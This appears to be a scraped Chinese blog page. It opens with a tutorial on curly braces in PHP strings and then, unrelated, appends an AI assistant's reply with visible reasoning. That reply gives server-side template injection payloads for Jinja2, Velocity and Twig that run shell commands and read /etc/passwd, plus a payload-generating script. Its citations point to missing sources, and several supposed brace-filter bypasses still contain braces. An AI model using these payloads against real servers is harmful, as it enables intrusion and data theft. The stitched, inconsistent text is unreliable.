php中大括号作用介绍

{}大括号在php中的作用(PHP变量放在大括号里面的含义)

一、不管什么程序,function name(){}, for(){}, ….太多了,不说也知道做什么用了。 
二、$str{4}在字符串的变量的后面跟上{}刚大括号和中括号一样都是把某个字符串变量当成数组处理。 
三、{$val}这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。 

复制代码代码如下:

$arr=array(0=>123, 'name'=>'你好'); 
foreach($array as $k=>$v){ 
echo "select * from blog_blogs where blog_tags like '%{$arr[$k]}%' order by blog_id"; //加一个大括号只是将作为变量的标志符 

echo '<br/ ><br/ ><br/ ><br/ ><br/ ><br/ ><br/ >'; 
foreach($array as $k=>$v){ 
echo "select * from blog_blogs where blog_tags like '%{{$arr[$k]}}%' order by blog_id"; //加两个大括号,外层的将作为普通的字符 

//用大括号来区分变量 
//echo "$arr['name']"; //用此句会报语法错误 
echo "{$arr['name']}"; //此句正常,大括号内的字符将作为变量来处理 
//$str{4} 在字符串的变量的后面跟上{} 大括号和中括号一样都是把某个字符串变量当成数组处理 
$str = 'abcdefg'; 
echo $str{4}; 


{}大括号在php中的作用(PHP变量放在大括号里面的含义) 

如:$sql = "insert into article (`channel_id`,`title`,`detail`,`pub_time`) values ('{$cid}','{$title}','{$detail}','{$time}');"; 
不加似乎也可以,加{}是什么意思呢? 
还有字段名 为什么要以``包括呢? 

============================================== 

至少便于阅读嘛~~~''是insert into语句要求的,因为字符串要成对出现嘛 
加{}有时候是为了防止变量名和后面的字符串连在一起嘛 
例如 
{$cid}dd 
如果cid=aa 
那么{$cid}dd=aadd 
不加的话你自己看看了$ciddd,岂不变成了ciddd变量了~~ 

PHP 变量后面加上一个大括号{},里面填上数字,就是指 PHP 变量相应序号的字符。 
例如: 
$str = 'hello'; 
echo $str{0}; // 输出为 h 
echo $str{1}; // 输出为 e 
如果要检查某个字符串是否满足多少长度,可以考虑用这种大括号(花括号)加 isset 的方式替代 strlen 函数,因为 isset 是语言结构,strlen 是函数,所以使用 isset 比使用 strlen 效率更高。 
比如判断一个字符串的长度是否小于 5: 
if ( !isset ( $str{5} ) ) 就比 if ( strlen ( $str ) < 5 ) 好。 


下面几个比较能说明原因的解释是: 

表示{}里面的是一个变量 ,执行时按照变量来处理 在字符串中引用变量使用的特殊包括方式,这样就可以不使用.运算符,从而减少代码的输入量了。 

其实输出那块是等同于print "hello ".$arr['fruit']; 

一、使用大括号的变量 
前一篇日志提到了,PHP Notice警告的是下面一句: 

switch (${action}.'_'.${child}) { 
初看并没有什么问题。我也查询了PHP手册上关于变量的定义:这里。 
1、可变变量的情况 
可见,与大部分资料一样,变量使用大括号的情况,在于“可变变量”(Variable variables)。其中提到: 


引用 
In order to use variable variables with arrays, you have to resolve an ambiguity problem. That is, if you write $$a[1] then the parser needs to know if you meant to use $a[1] as a variable, or if you wanted $$a as the variable and then the [1] index from that variable. The syntax for resolving this ambiguity is: ${$a[1]} for the first case and ${$a}[1] for the second. 
也就是说,为了在数组环境中也可以使用可变变量,因此,需要根据不同的情况,恰当的使用大括号{}限制变量的范围。${$a[1]} 与${$a}[1] 是完全不同的: 


引用 
${$a[1]} 这里$a[1]是一个变量; 
${$a}[1] 这里$a是一个变量; 
2、定界、避免歧义 
实际上,这情况与可变变量时类似。例如,若使用“.”连接符,连接一个字符串,可能是这样: 

echo $str.'_2010'; 
用大括号来写,可能更简单: 

echo "${str}_2010"; 
可见,如果没有大括号,则可能把$str_2010整个作为一个变量来处理。当然,这样的写法,只能用在双引号中,单引号里面是不会执行变量替换的。 

3、字符串变量中的单个字符 
例如: 
复制代码代码如下:

<?php 
$str='000'; 
$str{0}='1'; 
echo $str; //输出为100 
?> 

这不难理解,与中括号[]的作用是一致的,有点类似Python中把字符串看成对象的情况。所以,下面的语句功能相同: 
复制代码代码如下:

<?php 
$str='000'; 
$str[0]='1'; 
echo $str; //也是输出100 
?> 

不过,这些都不是我想说明的内容,真正想描述的情况,请见下面。 

二、变量使用大括号的异同 
首先,把PHP的错误信息输出全部打开,即/etc/php.ini 为: 


引用 
error_reporting = E_ALL 
display_errors = On 
然后,打开测试页面,其中代码为: 
复制代码代码如下:

<?php 
$test='123'; 
echo $test; 
echo "${test}"; 
echo "{$test}"; 
echo ${test}.'_'; 
echo ${test}; 
?> 

你会看到如下的结果: 


引用 
123123123 
Notice: Use of undefined constant test - assumed 'test' in /var/www/html/phpcrm/testpages/variables.php on line 6 
123_ 
Notice: Use of undefined constant test - assumed 'test' in /var/www/html/phpcrm/testpages/variables.php on line 7 
123 
这说明什么? 
1、可接受的写法 
从输出结果中“123123123”,表明前面三行的echo语句都是正常的: 
复制代码代码如下:

echo $test; 
echo "${test}"; 
echo "{$test}"; 

2、不建议的写法 
后面的两行都有Notice警告,也就是曾把test变量看成常量,只是后来才假设为变量来处理的。因此,为了避免歧义和冲突,不建议这样写: 
复制代码代码如下:

echo ${test}.'_'; 
echo ${test}; 

不过,可以有一种变通的写法 
复制代码代码如下:

echo ${'test'}.'_'; 
echo ${'test'}; 

这样写的话就不会报错了 
3、不正确的写法 
网上不少资料介绍,${var}与{$var}的作用是一样的。但是,如果你再加入一句: 

echo {$test}; 
那么,你将会得到以下错误信息: 


引用 
Parse error: syntax error, unexpected '{' in /var/www/html/phpcrm/testpages/variables.php on line 8 
这可不是Notice警告,是错误,因解析问题,程序将不能正常运行。 

三、总结 
结合前面两部分的内容,我相信,对于变量引用时使用大括号,应遵循以下原则: 


引用 
1、正确的写法为:${var} 的形式; 
2、与双引号一同使用; 
3、根据需表达的意思进行定界。 
所以,最后我把switch一行改为: 

switch ("${action}_${child}") { 
即不再出现Notice警告。


<think>好的,我现在需要帮助用户找到绕过SSTI中大括号过滤的方法或脚本。首先,我需要理解用户的问题。用户提到SSTI(服务器端模板注入)中的大括号被过滤,想要绕过这种限制。根据提供的引用资料,特别是引用[2]和[4],里面提到了Python中的一些绕过技巧,比如利用字符串拼接和属性链访问。 首先,用户可能需要知道如何在不使用大括号的情况下执行模板注入。例如,在Jinja2中,通常使用`{{...}}`来插入表达式,但如果这些大括号被过滤了,就需要其他方法。引用[4]提到,在Python中可以使用字符串拼接,比如`'l''s'`会被视为`'ls'`,这可能帮助绕过某些过滤机制。 接下来,考虑替代的模板语法。比如,在Jinja2中,`{% ... %}`用于执行语句,但这也可能被过滤。不过,如果应用允许其他模板语法,比如使用`${...}`或者`#{...}`,可能可以绕过,但这取决于具体的模板引擎。 然后,回顾引用[2]中的例子,使用类的继承链来访问危险函数。例如,通过`''.__class__.__mro__[2].__subclasses__()`来获取需要的子类,进而执行命令或读写文件。这里的关键是构造这样的链式调用而不显式使用大括号。可能需要利用其他符号或语法,比如使用中括号或点号来访问属性。 另外,引用[4]中的案例展示了如何通过拼接字符串来绕过关键字检测。比如,将`dir`拆分为`'d'+'i'+'r'`,或者将`os`拆分为`'o'+'s'`。这种方法可以避免直接出现被过滤的关键字,同时允许动态构造所需的函数调用。 还需要考虑是否有其他方式注入模板代码。例如,利用模板引擎的注释语法、变量替换或者其他内置函数。例如,在Velocity模板中,可以使用`#set`指令来执行代码,或者利用反射机制调用方法。 不过,用户可能更关注Python环境下,特别是Jinja2的绕过方法。此时,可以建议尝试使用`{% if ... %}`标签来执行代码,或者利用`request.args`或`request.values`来获取参数,从而动态构造payload。 另外,如果大括号被过滤,可能需要使用HTML编码或其他编码方式来绕过。例如,使用`{`代替`{`,但这取决于模板引擎是否解析这些编码。 还有,可以考虑使用模板引擎的沙盒逃逸技术。例如,通过访问内置的命名空间,如`__builtins__`,或者利用已有的对象(如空字符串、数组)的类继承链来访问危险模块,如`os`或`subprocess`。 总结一下,可能的绕过方法包括:字符串拼接、利用其他模板标签、属性链访问、编码绕过、沙盒逃逸等。需要根据具体的过滤规则和模板引擎类型来选择合适的方法。</think>针对SSTI(服务器端模板注入)中大括号$\\{\\}$过滤的绕过方法,可通过以下技术实现: --- ### 一、利用字符串拼接绕过关键字过滤(Python/Jinja2) 当大括号被过滤时,可通过字符串拼接构造表达式: ```python # 示例:执行命令"ls" {{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['o'+'s'].system('l''s') }} ``` - **关键点**:使用`'o'+'s'`代替`os`,`'l''s'`代替`ls`,避免直接出现敏感字符[^4]。 --- ### 二、使用替代语法标签(Jinja2) 若`{{`被过滤,尝试使用其他模板标签: ```python {% set x = 'os' %}{% set y = 'system' %}{% set cmd = 'id' %}{{ self.__init__.__globals__.__getitem__(x).__getattr__(y)(cmd) }} ``` - **原理**:利用`{% %}`标签定义变量,间接调用危险函数[^4]。 --- ### 三、利用属性链访问绕过符号限制 通过对象继承链访问敏感模块: ```python # 示例:读取文件 {{ request.__class__.__mro__[1].__subclasses__()[182].__init__.__globals__.__builtins__.open('/etc/passwd').read() }} ``` - **说明**:通过`request`对象的属性链访问`__builtins__.open`函数[^2]。 --- ### 四、编码绕过技术 对关键字进行编码转换(如十六进制、ASCII码): ```python # 十六进制编码示例 {{ ''.__class__.__base__.__subclasses__()[72].__init__.__globals__['\x6f\x73'].system('\x6c\x73') }} ``` - **效果**:绕过基于字符串匹配的过滤规则。 --- ### 五、利用沙盒逃逸技术(通用) 通过反射或内置函数调用底层模块: ```python # 调用os模块执行命令 {{ ''.__class__.__mro__[2].__subclasses__()[128].__init__.__globals__['popen']('whoami').read() }} ``` - **原理**:利用`subprocess.Popen`执行系统命令。 --- ### 六、使用非大括号语法(其他模板引擎) 不同模板引擎的替代语法: 1. **Velocity(Java)**:使用`#set`指令构造代码执行: ```java #set($exec="")${new java.lang.ProcessBuilder("id").start()} ``` 2. **Twig(PHP)**:利用`_self`对象调用系统函数: ```php {{ _self.env.registerUndefinedFilterCallback("system") }}{{ _self.env.getFilter("id") }} ``` --- ### 自动化脚本示例(Python) 以下脚本通过替换和拼接生成绕过Payload: ```python def generate_ssti_payload(cmd): parts = { "os": "'o'+'s'", "cmd": "+".join(f"'{c}'" for c in cmd) } payload = f"{{{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__[{parts['os']}].system({parts['cmd']}) }}}}" return payload.replace("{", "%7B").replace("}", "%7D") # URL编码绕过 print(generate_ssti_payload("ls")) ``` --- ### 防御建议 1. 严格限制用户输入,禁止传入模板控制符号。 2. 使用沙盒环境运行模板引擎,限制内置模块访问[^3]。 3. 对渲染内容进行输出编码,避免注入生效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值